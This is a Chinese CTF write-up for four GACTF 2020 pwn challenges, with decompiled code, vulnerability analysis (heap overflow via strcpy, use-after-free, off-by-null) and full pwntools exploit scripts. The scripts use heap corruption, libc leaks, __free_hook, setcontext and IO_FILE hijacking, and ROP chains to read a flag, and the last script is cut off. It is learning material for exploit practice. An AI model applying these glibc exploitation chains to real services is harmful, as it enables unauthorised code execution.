2020GACTF

2020-12-19

字数统计: 4.6k字 | 阅读时长≈ 25分

希望能够趁着放假时间多做一点题，下学期可能做项目就真的没时间了。题目量挺多，然后有几道题找不到文件了。

VM_PWN

程序分析

这道题应该算是十分纯正的vm_pwn了。

init_0();
regs = calloc(0x30uLL, 1uLL);                 // regs[0]=rdi,regs[1]=rsi,regs[2]=rdx
data1 = (char *)calloc(0x1000uLL, 1uLL);
data2 = (char *)calloc(0x2000uLL, 1uLL);
regs[3] = data2 + 0x1E00;                     // regs[3]=rsp
regs[5] = &unk_203020;
if ( !data1 || !data2 )
  sub_AC0((__int64)"out of memory");
while ( 1 )                                   // op
{
  v3 = (unsigned __int8 *)regs[5];            // regs[5]=rip

首先含有regs含有5个寄存器，分别是：rdi, rsi, rdx 和 rsp 、 rip。

然后后续的各种操作，我们只分析其中典型的操作：

     case 0x20:                                // rdi=rsp
       *regs = regs[3];
       break;
//0x21-0x23
     case 0x21:
       *regs = *(_QWORD *)regs[5];             // rdi=*rip
       regs[5] += 8LL;
       break;
//0x30
  case 0x30:
       idx = *(_QWORD *)regs[5];
       if ( idx < 0 || idx > 0xFFF )
         sub_AC0((__int64)"buffer overflow detected");
       *regs = &data1[idx];                    // rdi=&data[idx]
       regs[5] += 8LL;
       break;
//0x31-0x33
  case 0x31:
       v11 = *(_QWORD *)regs[5];
       if ( v11 < 0 || v11 > 4095 )
         sub_AC0((__int64)"buffer overflow detected");
       *regs = *(_QWORD *)&data1[v11];         // rdi=data1[idx]
       regs[5] += 8LL;
       break;
//0x43-0x45
     case 0x43:
       v14 = *(_QWORD *)regs[5];
       if ( v14 < 0 || v14 > 4095 )
         sub_AC0((__int64)"buffer overflow detected");
       *(_QWORD *)&data1[v14] = *regs;         // data1[idx]=rdi
       regs[5] += 8LL;
       break;
//0x54-0x56
     case 0x54:
       if ( (__int64)(regs[3] - (_QWORD)data2) <= 8 )
         sub_AC0((__int64)"stack underflow detected");
       regs[3] -= 8LL;
       *(_QWORD *)regs[3] = *regs;             // rsp=rdi,push rdi
       break;
//0x61-0x63
     case 0x61:
       if ( (__int64)(regs[3] - (_QWORD)data2) > 7679 )
         sub_AC0((__int64)"stack overflow detected");
       v4 = (_QWORD *)regs[3];
       regs[3] = v4 + 1;
       *regs = *v4;                            // pop rdi
       break;
//0x71-0x7f
     case 0x71:
       v17 = *(_QWORD *)regs[5];
       regs[5] += 8LL;
       *regs += v17;                           // rdi+=pc
       break;
//0x8e
     case 0x8E:
       v32 = *(__int16 *)regs[5];
       regs[5] += 2LL;
       regs[5] += v32;                         // pc += off,jmp pc+off
       break;
//0x8f
     case 0x8F:
       regs[5] = *regs;                        // pc=rdi,jmp rdi
       break;
//0x90
     case 0x90:
       regs[3] += 8LL;
       *(_QWORD *)regs[3] = regs[5];
       regs[5] = *regs;                        // rsp=pc,pc=rdi, call rdi
       break;
//0x91
     case 0x91:
       v20 = *(_QWORD *)regs[5];
       regs[5] += 8LL;
       regs[3] += 8LL * (v20 / 8);             // rsp+=off
       break;
//0x98
     case 0x98:
       v33 = *(__int16 *)regs[5];
       regs[5] += 2LL;
       regs[3] += 8LL;
       *(_QWORD *)regs[3] = regs[5];           // rsp=pc, pc+=off, call pc+off
       regs[5] += v33;
       break;
//0x9f
     case 0x9F:
       id = *(unsigned __int8 *)regs[5]++;
       ((void (__fastcall *)(_QWORD, _QWORD, _QWORD))*(&off_2038E0 + id))(*regs, regs[1], regs[2]);// syscall
       break;
//0xa0
     case 0xA0:
       mem = (_QWORD *)regs[3];
       regs[3] = mem - 1;
       regs[5] = *mem;                         // rip=rsp
       break;

这个操作已经十分完整了。而且程序会运行自己的一些指令，这里从 vidar的wp学到了直接将字节码转换为指令的脚本，以后如果有类似题目应该可以直接用了：

#coding=utf8
#!/usr/bin/python3

def parse_line(data, next_pc):
    try:
        op = data[next_pc]
        next_pc += 1
        #op = int(op,16)
        print(op, op==0x7e)
        if op == 0x10:
            msg = 'mov reg0, rsp'
        elif op >= 0x11 and op <= 0x13:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'mov reg%s, %s'%  (op - 0x11, hex(num))
        elif op == 0x20:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'mov reg0, &data[%s]' % hex(num)
        elif op >= 0x21 and op <= 0x23:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'mov reg%s, data[%s]' % (op-0x21, hex(num))
        elif op >= 0x33 and op <= 0x35:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'mov data[%s], reg%s' % (hex(num), op-0x33)
        elif op >= 0x44 and op <= 0x46:
            msg = 'push reg%s' % (op-0x44)
        elif op >= 0x51 and op <= 0x53:
            msg = 'pop reg%s' % (op-0x51)
        elif op >= 0x61 and op <= 0x63:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'add reg%s, %s' % (op-0x61, hex(num))
        elif op >= 0x64 and op <= 66:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'sub reg%s, %s' % (op-0x64, hex(num))
        elif op >= 0x67 and op <= 0x69:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'mul reg%s, %s' % (op-0x67, hex(num))
        elif op >= 0x6a and op <= 0x6c:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'xor reg%s, %s' % (op-0x6a, hex(num))
        elif op >= 0x6d and op <= 0x6f:
            msg = 'xor reg%s, reg%s', (op-0x6d, op-0x6d)
        elif op == 0x7e:
            num = int.from_bytes(data[next_pc:next_pc+2], 'little', signed=True)
            next_pc += 2
            #next_pc += num
            msg = 'jmp %s' % hex(next_pc + num)
            print('1:',msg)
        elif op == 0x7f:
            msg = 'jmp reg0'
        elif op == 0x80:
            msg = 'call reg0'
        elif op == 0x81:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'add rsp, %s' % hex(num)
        elif op == 0x82:
            num = int.from_bytes(data[next_pc:next_pc+8], 'little', signed=True)
            next_pc += 8
            msg = 'sub rsp, %s' % hex(num)
        elif op == 0x88:
            num = int.from_bytes(data[next_pc:next_pc+2], 'little', signed=True)
            next_pc += 2
            msg = 'call %s' % hex(next_pc + num)
        elif op == 0x8f:
            num = data[next_pc]
            next_pc += 1
            functions = ['read', 'write', 'puts', 'free']
            msg = 'syscall %s' % (functions[num])
        elif op == 0x90:
            msg = 'ret'
        elif op == 0xff:
            msg = 'halt'
            next_pc = -1
        else:
            msg = 'error op %s' % hex(op)
            next_pc = -1
    except:
        next_pc = -1
        msg = ''
    messg = str(hex(op))+" "+msg
    return next_pc, messg


def parse(data, pc):
    fp = open('opcd.txt', 'w')
    while pc != -1:
        next_pc, msg = parse_line(data, pc)
        info = "%5s: %s\n" % (hex(pc), msg)
        print("%5s: %s" % (hex(pc), msg))
        fp.write(info)
        pc = next_pc
    fp.close()

def find_gadget(data):
    for i in range(len(data)):
        try:
            pc = i
            next_pc, msg = parse_line(data, pc)
            if ('syscall' in msg) or ('pop reg' in msg):
                count = 0
                print('-' * 0x10)
                while pc != -1 and count < 5:
                    print('%5s: %s' % (hex(pc), msg))
                    pc = next_pc
                    count += 1
                    next_pc, msg = parse_line(data, pc)

        except:
            continue

if __name__ == '__main__':
    with open('code.txt', 'rb') as fd:
        data = fd.read()
    from sys import argv
    data1 = data.split(b'\r\n')
    num = 0
    data3 = []
    for i in data1:
        data2 = i.split(b' ')
        for d in data2:
            if d != b'':
                data3.append(int(d,16))
    print(data3)
    try:
        pc = int(argv[1], 16)
    except:
        pc = 0

    parse(data3, pc)

    print('\n----------gadget------------')
    #find_gadget(data)

我们可以得到程序的处理逻辑，我们可以发现三处可疑点：

0x2a0: 0x44 push reg0
0x2a1: 0x52 pop reg1
0x2a2: 0x11 mov reg0, 0x0
0x2ab: 0x13 mov reg2, 0x1000
0x2b4: 0x8f syscall read	//第一次读取0x1000

0x320: 0x10 mov reg0, rsp
0x321: 0x44 push reg0
0x322: 0x52 pop reg1
0x323: 0x11 mov reg0, 0x0
0x32c: 0x13 mov reg2, 0x1000
0x335: 0x8f syscall read	//第二次读取0x1000

1
2
3

0x39c: 0x8f syscall write
0x39e: 0x81 add rsp, 0x100
0x3a7: 0x90 ret	//ret

程序总共有两次读取，这两次读取的size都非常大。而最后 ret时会先将 rsp增加 0x100，此时 rsp是一个堆地址，然后将 rsp的值赋给 rip，然后此时由于 rip为 0xff所以会执行 ret。

那么，我们可以通过第一次 read，连接到该堆地址处，再通过write将其输出，得到我们输入数据存储的堆地址。

通过第二次read，覆盖该堆地址为我们的输入地址。那么程序执行 ret时就会进入我们的输入数据中，去执行我们自己的逻辑。

利用分析

上面已经讲了如何控制程序执行流。

还有几个关键点，程序开启了沙箱，只能执行 orw。由于不自带 open，所以我们需要先泄露 libc地址。

这里可以先 free一个大的chunk，再输出该地址。

为了执行 open，我们需要覆盖程序可执行的4个函数中的 free，所以我们需要得到程序的基址。这里我采用先通过 environment泄露出栈地址，再通过栈地址，泄露出程序的运行地址，最后得到 free的地址，将其覆盖为 open。

最后就是常规的 orw。

EXP

from pwn import *
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])
filename = './vmpwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    libc = ELF(libcname)
    elf = ELF(filename)

def Pwn():
    #gdb.attach(p, 'bp $rebase(0xcd6)')
    payload = 'a'*0xf0
    p.sendafter('tell me what is your name:', payload)
    p.recvuntil('a'*0xf0)
    heap_addr = u64(p.recvuntil('\n', drop=True)[-6:].ljust(8, b'\x00'))
    start_addr = heap_addr+0x2d18
    print('heap_addr:',hex(heap_addr),hex(start_addr))
    payload = p8(0x11)+p64(heap_addr) #mov rdi heap2_addr
    payload += p8(0x12)+p64(0) #move rsi, 0
    payload += p8(0x13)+p64(0)  #mov rdx, 0
    payload += p8(0x8f)+p8(0x3) #free(chunk)
    payload += p8(0x11)+p64(1)  #mov rdi, 1
    payload += p8(0x12)+p64(heap_addr)  #mov rsi, heap
    payload += p8(0x13)+p64(0x8)    #mov rdx, 8
    payload += p8(0x8f)+p8(1)   #write(1, heap, 0x8)
    payload += p8(0x11)+p64(0)   #mov rdi, 0
    #payload += p8(0x12)+p64(start_addr+len) #mov rsi, addr
    payload += p8(0x13)+p64(0x120)  #mov rdx, 0x100
    lens = len(payload)
    payload += p8(0x12) + p64(start_addr + lens+11)  # mov rsi, addr
    payload += p8(0x8f)+p8(0)   #read(0, addr, 0x100)
    len2 = len(payload)
    payload = payload.ljust(0x100, b'\x00')+p64(start_addr)

    #len2 = len(payload)

    p.sendlineafter('ok,what do you want to say:', payload)

    libc_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x10 - 88 - libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr))
    system_addr = libc_addr+libc.sym['system']
    free_hook = libc_addr+libc.sym['__free_hook']
    open_addr = libc_addr+libc.sym['open']
    env = libc_addr+libc.symbols['environ']
    print('open:',hex(open_addr),hex(env))

    payload = p8(0x11)+p64(env)
    payload += p8(0x8f)+p8(0x2)    #puts(env)
    payload += p8(0x11)+p64(0)   #mov rdi, 0
    payload += p8(0x11)+p64(0)
    payload += p8(0x13)+p64(0x200)
    len3 = len(payload)
    payload += p8(0x12) + p64(start_addr + len2 + len3 +11)
    payload += p8(0x8f)+p8(0)   #read(0, addr2, 0x100)
    #raw_input()
    p.sendline(payload)
    len4 = len(payload)

    plt_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
    print('plt_addr:',hex(plt_addr))
    stack_addr = plt_addr-0xf8
    print('stack_addr:',hex(stack_addr))

    payload = p8(0x11)+p64(stack_addr)
    payload += p8(0x8f)+p8(2)  #puts(stack_addr)
    payload += p8(0x11)+p64(0)   #mov rdi, 0
    payload += p8(0x13)+p64(0x150)
    len5 = len(payload)
    payload += p8(0x12) + p64(start_addr + len2+len4 + len5 +11)
    payload += p8(0x8f)+p8(0)   #read(0, addr2, 0x100)

    p.sendline(payload)
    len6 = len(payload)
    print('==============> final')
    free_got = u64(p.recvuntil('\x55')[-6:].ljust(8, b'\x00'))+(0x2038f8-0x1740)
    print('free_got:',hex(free_got))
    payload = p8(0x11)+p64(0)
    payload += p8(0x12)+p64(free_got)
    payload += p8(0x13)+p64(0x10)
    payload += p8(0x8f)+p8(0)   #read(0, free_got, 0x10)
    payload += p8(0x12)+p64(0)
    payload += p8(0x11)+p64(start_addr+len2+len4+len6+0x100)
    payload += p8(0x8f)+p8(0x3)     #open(0, flag)
    payload += p8(0x11)+p64(3)
    payload += p8(0x12)+p64(start_addr+len2+len4+len6+0x120)
    payload += p8(0x13)+p64(0x100)
    payload += p8(0x8f)+p8(0x0) #read(3, flag, 0x100)
    payload += p8(0x11)+p64(start_addr+len2+len4+len6+0x120)
    payload += p8(0x8f)+p8(2)
    payload = payload.ljust(0x100, b'\x00')+b'flag\x00'

    p.sendline(payload)
    raw_input()
    p.sendline(p64(open_addr))

    p.interactive()

Pwn()

card

程序分析

char *__fastcall sub_1497(char *a1, unsigned int a2)
{
  memset(src, 0, (int)a2);
  read(0, src, a2);
  return strcpy(a1, src);                       // overflow
}

漏洞点在 edit函数，这里使用了 strcpy。如果我们先用大size的字符串覆盖了 src，然后再用小 size时，memset只会清空小 size，而调用 strcpy时就存在堆溢出。

然后，存在一个后门可以调用3次正常的 edit，可以输入 \x00。

利用分析

首先是常规的堆溢出，修改 chunk_size，并释放到 unsortdebin，得到 libc地址。

这里需要注意的是泄露地址时，我们需要先构造两个 free tcache，再通过堆溢出，将 free chunk1的 next指向一个已分配的含有 Libc地址的堆块。这样就将libc地址放到了 tcache中，然后修改 libc的后两位指向 stdout来泄露地址。

最后是提权的方法。

这里只能执行 orw，所以常规思路：

将 free_hook改为 magic_addr
构造一个 frame结构，在里面布置好 setcontex+61的地址，和将 rsp设置为 orw的地址，将 rip设置为 ret
这样最后就能通过 setcontext执行ret 到 orw处，执行 rop

frame_addr = free_hook
orw = free_hook+0xb0

def magic_frame(gadget, frame_addr, setcontext61, orw, ret):
    payload = p64(gadget)+p64(frame_addr)+p64(0)*2+p64(setcontext61)
    payload += b'flag\x00'.ljust(8, b'\x00')
    payload += b'\x00'*0x70+p64(orw)+p64(ret)
	return payload

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])
filename = './card'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    libc = ELF(libcname)
    elf = ELF(filename)

def Add(size):
    p.sendlineafter('Choice:', str(1))
    p.sendlineafter('Size: ', str(size))
def Reset(idx,content):
    p.sendlineafter('Choice:', str(2))
    p.sendlineafter('Index: ', str(idx))
    p.sendafter('Message: ', content)
def Delete(idx):
    p.sendlineafter('Choice:', str(3))
    p.sendlineafter('Index: ', str(idx))
def Edit(idx, content):
    p.sendlineafter('Choice:', str(5))
    p.sendlineafter('Index: ', str(idx))
    p.sendafter('Message: ', content)

def magic_frame(rdx_rdi, secontext_addr, rdi, rsi, rdx, rsp, rip):
    payload = p64(rdx_rdi) + p64(0) * 2  #rdx
    payload += p64(secontext_addr)             #call func_addr
    payload = payload.ljust(0x60, '\x00')
    payload += p64(rdi) + p64(rsi)  # rdi , rsi
    payload += p64(0) * 2 + p64(rdx) + p64(0x18) + p64(0)  # rdx
    payload += p64(rsp) + p64(rip)  # rsp, rip
    payload = payload.ljust(0xf8, '\x00')
    return payload

while 1:
    try:
        Add(0x68)   #0
        Add(0x90)   #1
        Add(0x68)   #2
        Add(0x68)   #3
        Add(0x68)   #4
        Add(0x400)  #5
        Add(0x68)   #6
        #gdb.attach(p, 'bp $rebase(0x18bf)')
        payload = 'a'*0x68+b'\x81'
        Reset(1, payload)
        payload = 'a'*0x68
        Reset(2, payload)   #chaneg chunk3 size

        payload = 'a'*8+b'\x21'
        Reset(4, payload)
        Reset(6, payload)
        Delete(3)   #0x81 chunk
        Add(0x78)   #3

        payload = 'a'*0x68+b'\x81\x04'
        Reset(3, payload)   #change chunk4 size
        Delete(4)   #into unsortedbin

        Add(0x68)   #4,libc
        Add(0x68)   #7,libc
        Add(0x68)   #8,libc

        Delete(0)
        Delete(8)
        Delete(4)

        payload = 'a'*0x70
        Reset(3, payload)
        payload = 'a'*0x68+b'\x71'
        Reset(3, payload)   #chaneg chunk4 fd->chunk7

        payload = b'\xa0\x66'
        Edit(7, payload)

        Add(0x68)   #0, chunk4
        Add(0x68)   #4, chunk7

        #gdb.attach(p, 'bp $rebase(0x18bf)')
        Add(0x68)   #8  #stadout
        payload = p64(0xfdad2887 | 0x1000) + p64(0)*3 + '\x00'
        Edit(8, payload)

        p.recvuntil(p64(0xfdad2887 | 0x1000), timeout=1)
        #p.recv(0x20)
        addr = u64(p.recvuntil('\x7f', timeout=1)[-6:].ljust(8, b'\x00'))
        print('addr:',hex(addr))
        libc.address = addr - 0x1eb980#+ 0xd20 - libc.sym['_IO_2_1_stdout_']
        libc_addr = libc.address
        print('libc_addr:',hex(libc_addr))
        if b"\x7f" not in p64(libc.address):
            raise EOFError
        log.success("libc address {}".format(hex(libc.address)))
        break
    except:
        p.close()
        p = process(filename)
#gdb.attach(p, 'bp $rebase(0x18bf)')
free_hook = libc.sym['__free_hook']
system_addr = libc.sym['system']
setcontext = libc.sym['setcontext']
print('free_hook',hex(free_hook))
p_rdi_r = 0x26b72 + libc_addr
p_rsi_r = 0x27529 + libc_addr
p_rdx_r12_r = 0x11c371 + libc_addr
p_rax_r = 0x4a550 + libc_addr
syscall = 0x66229 + libc_addr

flag_str_addr = free_hook+0x220
flag_addr = free_hook+0x300

orw = flat([
    p_rdi_r, flag_str_addr,
    p_rsi_r, 0,
    p_rax_r, 2,
    syscall,
    p_rdi_r, 3,
    p_rsi_r, flag_addr,
    p_rdx_r12_r, 0x50, 0,
    p_rax_r, 0,
    syscall,
    p_rdi_r, 1,
    p_rsi_r, flag_addr,
    p_rdx_r12_r, 0x20, 0,
    p_rax_r, 1,
    syscall
])
ret = 0x25679 + libc_addr

Add(0x321)  #9
Add(0x90)   #10
Add(0x68)   #11
Add(0x68)   #12
Add(0x68)   #13
Add(0x300)  #14
Add(0x68)   #15
Add(0x371)  #16

payload = 'a'*0x68+b'\x81'
Reset(10, payload)
payload = 'a'*0x68
Reset(11, payload)  #change 12 size
payload = 'a'*8+'\x21'
Reset(13, payload)

print('++++++++chaneg 13 size')
Delete(12)
Add(0x78)   #12
payload = 'a'*0x68+b'\x81\x03'
Reset(12, payload)  #change 13 size

Delete(16)
Delete(13)
payload = 'a'*0x70+p64(free_hook)
Reset(12, payload)

Add(0x371)  #13
Add(0x371) #16  free_hook
magic_addr = libc_addr + 0x154930
orw_addr = free_hook+0x120
frame_addr = free_hook
payload = p64(magic_addr)
payload += magic_frame(frame_addr, setcontext+61, 0,0,0,orw_addr, ret)
payload = payload.ljust(0x120, b'\x00')+orw
payload = payload.ljust(0x220, b'\x00')+'./flag\x00'
Edit(16, payload)

Delete(16)

p.interactive()

student_manager

程序分析

很简单的 2.27 uaf 漏洞。

    v1 = *(unsigned int *)(chunk_list[i] + 32LL);
    if ( (_DWORD)v1 == id )
    {
      operator delete((void *)chunk_list[i], 0x24uLL);// UAF
      v3 = std::operator<<<std::char_traits<char>>(&std::cout, "remove success", v2);
      std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
      break;
    }
  }
}

但是，我却做了很久，主要是用不了自己带符号的libc，调试堆时很不方便。二是修改 next指针时只能修改 4位，需要构造各种错位。

利用分析

劫持 tcache_struct_perthread来泄露地址。

最后劫持 free_hook来 getshell。（但是，最后失败了，我真的一脸懵逼）。

后面看了 wp，发现出题人是把 free_hook给 patch了，导致只能通过 IO_FILE来做。（没符号，调试IO 直接自闭了：）

IO_FILE攻击，覆写 _IO_2_1_stdout的 vtable指向 _io_str_jumps的 finish。将 _IO_2_1_stdout+0xe8覆盖为 system地址。在输出流中写入';sh'。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])
filename = './student_manager'
libcname = './libc-2.27.so'
debug = 1
if debug == 1:
    p = process([filename], env={"LD_PRELOAD":"./libc-2.27.so"})
    elf = ELF(filename)
    libc = ELF(libcname)

def Add(idx, name, score):
    p.sendlineafter('choice:', str(1))
    p.sendlineafter('id:', str(idx))
    p.sendlineafter('s name:', name)
    p.sendlineafter('s score:', str(score))

def Show(idx):
    p.sendlineafter('choice:', str(2))
    p.sendlineafter('id:', str(idx))

def Delete(idx):
    p.sendlineafter('choice:', str(3))
    p.sendlineafter('id:', str(idx))

def numtonum(num):
    if num < 0x7fffffff:
        addr = num
        return addr
    else:
        a= num^0xffffffff
        b = a+1
        d= int(b)
        return -d

def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
      possible_IO_str_jumps_offset = ref_offset - 0x20
      if possible_IO_str_jumps_offset > IO_file_jumps_offset:
         return possible_IO_str_jumps_offset
_IO_str_jumps_s = get_IO_str_jumps()

Add(0, 'aaaa', '112233')
Add(1, 'aaaa', '1')
Delete(0)
Delete(0)
Show(0)
p.recvuntil('score:')
heap_addr1 = int(p.recvuntil('\n', drop=True))&0xFFFFFFFF
heap_addr2 = heap_addr1  - 0x13280

#raw_input()

print('heap_addr:',hex(heap_addr1), str(int(heap_addr2)),hex(heap_addr2))

payload = numtonum(heap_addr2)

Add(2, '2', int(payload))
Add(3, '3', '3')    #3
Add(4, '4', '4')    #tcache struct

for i in range(8):
    Delete((4+0x1000000*i))

Show((4+0x1000000*7))
p.recvuntil('score:')
libc_addr1 = int(p.recvuntil('\n', drop=True))&0xFFFFFFFF
print('libc_addr1:',hex(libc_addr1))
             #-0x10-88-libc.sym['__malloc_hook']
gdb.attach(p, 'bp $rebase(0x13bb)')
Add(5, '5', '5')    #libc
libc_addr2=libc_addr1-0x10-96-libc.sym['__malloc_hook']
free1 = libc_addr2+libc.sym['__free_hook']-0x18
stdout1 = libc_addr2+libc.sym['_IO_2_1_stdout_']+0xe8
system1 = libc_addr2+libc.sym['system']
_IO_str_jumps_addr_low4_bytes = libc_addr2 + _IO_str_jumps_s
vtable_jump_low4_bytes = _IO_str_jumps_addr_low4_bytes - 0x28

print('system:',hex(system1),hex(stdout1))
payload = numtonum(stdout1)
Add(6, p32(0), int(payload))    #libc to std+0xd8
print('+++++ 6 libc')
Add(7, '7', int(payload))    #libc

Delete(1)
Delete(1)
Delete(1)
Delete(1)
addrs=heap_addr2+0x60
payload1 = numtonum(addrs) #
print(payload1,hex(heap_addr2+0x60))
Add(8, '8', int(payload1))    #1
Add(9, '9', '9')

payload2 = numtonum(stdout1-0x10)
Add(10, p32(stdout1), int(payload2))    #stdout+0xd8
payload2 = numtonum(system1)
Add(11, ';sh',int(payload2))  #stdout_0xd8->0xe8
print('===========> change io_str_jumps')
Delete(9)
Delete(9)
Delete(9)
Delete(9)
payload = numtonum(heap_addr2+0x60) #
Add(12, '11', int(payload)) #change free_hook
Add(13, '12', '12')
Add(14, '13', '13')
print('=========== ok')
payload = numtonum(vtable_jump_low4_bytes)
Add(15, "';sh", int(payload)) #0xe8->system


p.interactive()

feedback

做这些题，我时常质问我为什么这么菜。

程序分析

char *__fastcall sub_1065(char *a1, unsigned int a2)
{
  char *result; // rax

  read(0, a1, a2);
  result = &a1[a2];
  *result = 0;                                  // off-by-null
  return result;
}

程序漏洞存在于输入时，有一个 off-by-null漏洞。

利用分析

这道题，和我之前分析 house-of-storm时做的题十分类似，都需要利用 largebin attack来泄露地址，最后是利用 house of orange的方法攻击 IO来执行 orw。但是，这道题，由于需要使用自己编译的 libc，调试时没有符号，十分阴间题目。

泄露地址

构造一次 largebin attack来修改 IO_2_1_stdout的 flags；再利用一次 unsortedbin attack来修改 IO_2_1_stdout的 IO_write_base。按理说，largebin attack可以将两个地址修改为 unsortedbin的地址，这里为什么不直接用一次 largebin attack将 flags和 IO_write_base都修改了，原因是由于这里的 largedbin的 fd_nextsize不含有 libc地址，我们不能直接伪造其指向 IO_2_1_stdout

getshell

泄露地址后，getshell的方法就类似于 house of orange，这里程序含有一个后门函数作用是修复 unsortedbin链表。也就是我们使用后门函数后，可以正常使用 house of orange攻击，不过这里开启了沙箱。需要最后去调用执行 orw。

EXP

from pwn import *
context.terminal=(['tmux', 'split', '-h'])
context.log_level = 'debug'
libc = ELF('./libc-2.23.so')
_IO_2_1_stdout_s = libc.symbols['_IO_2_1_stdout_']

def add(size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('length?',str(size))
   sh.sendafter('us:',content)

def delete(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('revoke?',str(index))

def edit(index,content):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('edit?',str(index))
   sh.sendafter('content',content)

def backdoor():
   sh.sendlineafter('>>','666')

def exploit():
   add(0xF0,'a') #0
   add(0xF0,'b') #1
   add(0xF0,'c') #2
   add(0xF0,'d') #3

   add(0xF0,'d') #4
   print('large bin in unsortedbin bin')
   #large bin in unsorted bin
   add(0x10,'e') #5
   add(0xF0,'e') #6
   add(0xF0,'e') #7
   add(0xF0,'e') #8
   add(0xF0,'e') #9
   #gap
   add(0xF0,'f') #10

   add(0x10,'g') #11
   #large bin
   add(0xF0,'h') #12
   add(0xF0,'h') #13
   add(0xF0,'h') #14
   add(0xF0,'h') #15

   add(0xF0,'i') #16

   add(0x10,'j') #17
   add(0xF0,'j') #18
   add(0xF0,'j') #19
   add(0xF0,'j') #20
   add(0xF0,'j') #21

   add(0x10,'k') #22
   add(0xF0,'k') #23
   add(0xF0,'k') #24
   add(0xF0,'k') #25

   add(0x10,'l') #26

   gdb.attach(sh, 'bp $rebase(0x137b)')
   delete(14)
   #null off by one
   add(0xF8,'h'*0xF0 + p16(0x320)) #14
   print('============= overlap chunk')

   #合并形成overlap chunk
   delete(11)
   delete(15)
   add(0x10,'g') #11
   print('================ put bin in large bin')
   #这两步的作用是将bin整理放入large bin
   delete(0)
   add(0xF0,'a') #0
   print('=========== edit largebin bk to io')
   edit(12,p64(0) + p16((2 << 12) + ((_IO_2_1_stdout_s-0x10) & 0xFFF)))
   #利用同样的方法再制造一个未归位的large bin chunk
   print('========= overlap 7 2')
   delete(7)
   #null off by one
   add(0xF8,'e'*0xF0 + p16(0x320)) #7
   delete(4)
   delete(8)
   #这两步的作用是将bin整理放入large bin，在这里可以触发large bin attack，从而可以修改IO_2_1_stdout的flags
   print('======== change io_2_1_stdout flags')
   delete(0)
   add(0xF0,'a') #0

   delete(19)
   #null off by one
   add(0xF8,'j'*0xF0 + p16(0x220)) #4
   delete(17)
   delete(20)
   add(0x10,'j') #8
   add(0xF0,'j') #15
   add(0xF0,'j') #17
   add(0xF0,'j') #19

   delete(15)
   print('========= unsortedbin attack')
   edit(18,p64(0) + p16((2 << 12) + ((_IO_2_1_stdout_s + 0x20 - 0x10 - 0x7) & 0xFFF)))

   #unsorted bin attack
   #15
   sh.sendlineafter('>>','1')
   sh.sendlineafter('length?',str(0xF0))
   sh.recv(0x18)
   libc_base = u64(sh.recv(8)) - libc.symbols['_IO_file_jumps']
   _IO_2_1_stdin_addr = libc_base + libc.sym['_IO_2_1_stdin_']
   _IO_list_all_addr = libc_base + libc.symbols['_IO_list_all']
   open_addr = libc_base + libc.sym['open']
   read_addr = libc_base + libc.sym['read']
   write_addr = libc_base + libc.sym['write']
   setcontext_addr = libc_base + libc.sym['setcontext']
   pop_rdi = libc_base + 0x0000000000021102
   pop_rsi = libc_base + 0x00000000000202e8
   pop_rdx = libc_base + 0x0000000000001b92
   bss = libc_base + libc.bss()
   IO_str_finish_ptr_addr = libc_base + 0x3c34b0
   print 'libc_base=',hex(libc_base)
   print '_IO_2_1_stdin_addr=',hex(_IO_2_1_stdin_addr)
   print 'IO_str_finish_ptr_addr=',hex(IO_str_finish_ptr_addr)
   if libc_base >> 40 != 0x7F:
      raise Exception('leak error')
   sh.sendafter('us:','a')
   print('======= leak libc addr ok')
   #read(0,bss,0x100)
   rop = p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x100) + p64(read_addr)
   #open(bss,0)
   rop += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(open_addr)
   #read(4,bss,0x30)
   rop += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
   #write(1,bss,0x30)
   rop += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x30) + p64(write_addr)
   #清空unsorted bin
   backdoor();
   #house of orange
   print('========= house of orange')
   delete(24)
   add(0xF8,'k'*0xF0 + p16(0x220)) #20
   delete(22)
   delete(25)
   add(0xF0,'k') #22
   edit(23,'k'*0xD0 + p64(0) + p64(0x61) + p64(0) + p64(_IO_list_all_addr - 0x10))
   payload = p64(0) + p64(0x0000000000160000)
   payload += '\x00'*0x98
   payload += p64(IO_str_finish_ptr_addr - 0x18)
   payload += p64(0) + p64(setcontext_addr+0x35)
   edit(20,payload)
   #getshell
   payload = '1'.ljust(0xA0,'a')
   payload += p64(0x0000000000160000 + 0x100)
